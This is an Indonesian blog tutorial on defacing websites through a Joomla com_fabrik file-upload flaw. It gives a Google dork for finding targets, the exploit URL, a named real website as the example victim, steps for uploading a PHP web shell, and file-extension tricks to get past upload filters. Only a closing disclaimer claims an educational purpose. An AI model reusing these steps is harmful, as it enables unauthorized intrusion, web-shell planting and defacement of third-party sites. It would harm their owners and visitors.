Cara Deface dengan Metode Joomla Com_Fabrik Remote Shell Upload Vulnerability
Ini sebenarnya bug lama. Namun ternyata sampai sekarang masih ada saja situs yang vuln dengan bug ini. Tentu saja dengan kesabaran dalam mencari target dan kepandaian mengolah google dork.Oke, langsung saja.
Cara Deface dengan Metode Joomla Com_Fabrik Remote Shell Upload Vulnerability
Google Dork :
inurl:index.php?option=com_fabrik
Kreasikan sendiri dork kalian.
Exploit:
index.php?option=com_fabrikc=importview=importfiletype=csvtable=1
Sebagai contoh, saya pilih http://www.duo-d-art.ch/index.php?option=com_fabrik
Ubah urlnya menjadi :
http://www.duo-d-art.ch/index.php?option=com_fabrikc=importview=importfiletype=csvtable=1
Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV
Dan shell kita akan terletak di www.target.com/media/shell.php
Selanjutnya bebas mau diapakan webnya haha.
Sebagai catatan saja, tidak semua web yang vuln epxloit ini bisa diupload shell backdoor. Kadang hanya support txt atau html saja. Tinggal kreasikan saja bypass ekstensi kalian misal diubah ke .phtml, .phpjpg, .phpfla, dll.
Oke sekian tutorial kali ini. Jika ada yang kurang jelas silahkan tinggalkan komentar.
Sumber http://noob1t4.blogspot.com/
Sekian Artikel Cara Deface dengan Metode Joomla Com_Fabrik Remote Shell Upload Vulnerability.
Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini
0 Response to "Cara Deface dengan Metode Joomla Com_Fabrik Remote Shell Upload Vulnerability"
Posting Komentar